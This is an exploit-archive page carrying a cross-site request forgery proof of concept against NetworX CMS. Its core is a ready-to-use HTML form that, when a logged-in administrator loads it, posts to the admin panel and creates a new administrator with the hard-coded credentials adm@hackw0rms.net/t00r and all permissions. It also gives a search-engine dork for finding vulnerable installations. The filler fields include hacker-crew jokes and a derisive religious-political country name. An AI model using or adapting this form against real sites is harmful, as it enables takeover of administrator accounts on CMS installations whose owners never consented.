what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NetworX CMS Cross Site Request Forgery

NetworX CMS Cross Site Request Forgery
Posted Apr 15, 2012
Authored by N3t.Crack3r

NetworX CMS suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | e46ed6288635f1e8daeb68d7c80c2ecab9a8de160c061df28e3fc994656789b6

NetworX CMS Cross Site Request Forgery

Change Mirror Download
# Exploit Title: NetworX CMS - CSRF Add Admin
# Date: 15-April-2012
# Author: N3t.Crack3r
# Software Link: http://www.socialabc.com/downloads/networx-social/
# Version: All Version
# Category:: [Webapps]
# Google dork: powered by networx
# Tested on: [Ubuntu]
# Demo site: http://www.socialabc.com/demo/

<!--
//================================================================================

___ ___ __ _______
/ | \_____ ____ | | ____ _ _\ _ \_______ _____ ______
/ ~ \__ \ _/ ___\| |/ /\ \/ \/ / /_\ \_ __ \/ \ / ___/
\ Y // __ \\ \___| < \ /\ \_/ \ | \/ Y Y \\___ \
\___|_ /(____ /\___ >__|_ \ \/\_/ \_____ /__| |__|_| /____ >
\/ \/ \/ \/ \/ \/ \/


Greets : Sho0ter , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members
================================================================================

// Login info : Email : adm@hackw0rms.net pass:t00r

# root@SecBoX:~# cat poc.php -->
<html>
<head>
<script language="javascript">
function country_changed()
{
document.getElementById('hdnSubmited').value = 'change_country';
document.getElementById('frmMain').submit();
}
</script>
</head>
<form action="http://<!----- REPLACE HEAR WITH URL ---->/admin/employer.php" form method="post" id="frmMain">
<input type="hidden" name="submited" value="save" id="hdnSubmited">
<br>
<p class="text_14 bold" align="center">NetworX CSRF - Add Admin</p>
<table cellpadding="5" border="0">
<tr>
<td align="right" class="text_12">Email:</td>
<td colspan="3">
<input type="text" name="UserEmail" value="adm@hackw0rms.net">
</td>
</tr>
<tr>
<td align="right" class="text_12">Password:</td>
<td colspan="3">
<input type="password" name="Password" value="t00r">
</td>
</tr>
<tr>
<td align="right" class="text_12">First Name:</td>
<td><input type="text" name="UserFirstname" value="Hack" class="t_box" style="width:150px;"></td>
<td align="right" class="text_12">Last Name:</td>
<td><input type="text" name="UserLastname" value="W0rm" class="t_box" style="width:150px;"></td>
</tr>
<tr>
<td align="right" class="text_12">Country:</td>
<td colspan="3">
<select name="UserCountry" onchange="country_changed()">
<option value="{ID}" {selected}>United state of Islam</option>
</select>
</td>
</tr>
<tr>
<td align="right" class="text_12">Address:</td>
<td colspan="3">
<input type="text" name="UserAddress1" value="69 1337 st" class="t_box" style="width:400px;">
</td>
</tr>
<tr>
<td align="right" class="text_12">City / Town:</td>
<td colspan="3">
<input type="text" name="UserCity" value="system32" class="t_box" style="width:200px;">
</td>
</tr>
<tr>
<td align="right" class="text_12">State / Province:</td>
<td>
<select name="UserState" class="t_box" style="width:100px;">
<option value="{ID}" {selected}>LA</option>
</select>
</td>
<td align="right" class="text_12">Zip Code:</td>
<td><input type="text" name="UserZip" value="31337" class="t_box" style="width:100px;"></td>
</tr>
<tr>
<td align="right" class="text_12">Contact Phone:</td>
<td colspan="3">
<input type="text" name="UserPhone" value="691337" class="t_box" style="width:200px;">
</td>
</tr>
<tr>
<td rowspan="10" valign="top" align="http://<!----- REPLACE HEAR WITH URL ---->/admin/employer.php" class="text_12">Permissions:</td>
<td><input type="checkbox" name="UserPermissions[]" value="1" class="t_box" checked="checked" func_if_true({PermissionCustomers}, 'checked')> User Management Tool</td>
</tr>
<tr>
<td><input type="checkbox" name="UserPermissions[]" value="2" class="t_box" checked="checked" func_if_true({PermissionContent}, 'checked')> Content Management Tool</td>
</tr>
<tr>
<td><input type="checkbox" name="UserPermissions[]" value="4" class="t_box" checked="checked" func_if_true({PermissionStatistics}, 'checked')> Statistics and Reports</td>
</tr>
<tr>
<td><input type="checkbox" name="UserPermissions[]" value="32" class="t_box" checked="checked" func_if_true({PermissionReports}, 'checked')> Complaint and Report Tool</td>
</tr>
</table>
<br>

<!-- buttons start -->
<table width="100%" cellpadding="5" border="0">
<tr>
<td width="80"> </td>
<td align="right">
<input type="submit" name="Save" value="Save" style="width:80px;">
</td>
</tr>
</table>
</form>
</html>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close